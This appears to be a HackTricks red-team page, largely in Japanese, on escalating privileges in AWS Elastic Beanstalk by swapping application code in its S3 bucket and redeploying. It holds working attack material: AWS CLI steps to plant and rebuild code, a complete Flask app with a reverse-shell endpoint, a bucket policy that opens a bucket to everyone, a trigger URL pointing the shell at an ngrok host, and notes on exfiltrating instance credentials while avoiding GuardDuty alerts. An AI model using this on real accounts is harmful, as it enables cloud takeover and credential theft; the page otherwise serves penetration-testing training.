Elastic Beanstalk
Elastic Beanstalkに関する詳細情報 は以下にあります:
AWS - Elastic Beanstalk Enum
Beanstalkで敏感なアクションを実行するには、多くの異なるサービスで多くの敏感な権限を持っている必要があります 。例えば、**arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk**に与えられた権限を確認できます。
elasticbeanstalk:RebuildEnvironment、S3書き込み権限&その他多数
環境のコードを含むS3バケットに対する書き込み権限 とアプリケーションを再構築 するための権限(elasticbeanstalk:RebuildEnvironmentやS3、EC2、Cloudformationに関連するいくつかの権限が必要)を持っていると、コードを変更 し、アプリを再構築 することができ、次回アプリにアクセスすると新しいコードが実行され 、攻撃者がアプリケーションとそのIAMロールの資格情報を侵害することが可能になります。
Copy # Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip < files to zi p >
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name" elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole など...
上記に加えて、いくつかの S3 EC2 cloudformation autoscaling elasticloadbalancing
AWS Elastic Beanstalk アプリケーションを作成する:
Copy aws elasticbeanstalk create-application --application-name MyApp
Copy aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role 既存の環境がすでに作成されていて、新しいものを作成したくない 場合は、既存のものを更新 することができます。
アプリケーションコードと依存関係をZIPファイルにパッケージします:
ZIPファイルをS3バケットにアップロードします:
Copy aws s3 cp MyApp . zip s3 : // elasticbeanstalk -< region >-< accId >/ MyApp . zip AWS Elastic Beanstalk アプリケーションバージョンを作成します:
Copy aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip" AWS Elastic Beanstalk 環境にアプリケーションバージョンをデプロイします:
Copy aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:SuspendProcesses
まず最初に、前のステップ に従って、被害者 で実行したいコード を含む正当なBeanstalk環境 を作成する必要があります。これには、これらの2つのファイル を含む単純なzip が必要です:
application.py requirements.txt
Copy from flask import Flask , request , jsonify
import subprocess , os , socket
application = Flask ( __name__ )
@application . errorhandler ( 404 )
def page_not_found ( e ):
return jsonify ( '404' )
@application . route ( "/" )
def index ():
return jsonify ( 'Welcome!' )
@application . route ( "/get_shell" )
def search ():
host = request . args . get ( 'host' )
port = request . args . get ( 'port' )
if host and port :
s = socket . socket (socket.AF_INET,socket.SOCK_STREAM)
s . connect ((host, int (port)))
os . dup2 (s. fileno (), 0 )
os . dup2 (s. fileno (), 1 )
os . dup2 (s. fileno (), 2 )
p = subprocess . call ([ "/bin/sh" , "-i" ])
return jsonify ( 'done' )
if __name__ == "__main__" :
application . run ()
Copy click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1 あなた自身の Beanstalk 環境で リバースシェルを実行している場合、次は それを移行 する時です 被害者 環境に。そうするためには、あなたの Beanstalk S3 バケットの バケットポリシーを更新 する必要がありますので、被害者がアクセスできるように します(これは バケットをすべての人に開放 することになります)。
Copy {
"Version" : "2008-10-17" ,
"Statement" : [
{
"Sid" : "eb-af163bf3-d27b-4712-b795-d1e33e331ca4" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : [
"s3:ListBucket" ,
"s3:ListBucketVersions" ,
"s3:GetObject" ,
"s3:GetObjectVersion" ,
"s3:*"
] ,
"Resource" : [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" ,
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
} ,
{
"Sid" : "eb-58950a8c-feb6-11e2-89e0-0800277d041b" ,
"Effect" : "Deny" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "s3:DeleteBucket" ,
"Resource" : "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
Copy # Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"
# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host =0.tcp.eu.ngrok.io & port = 13528
Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. 
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)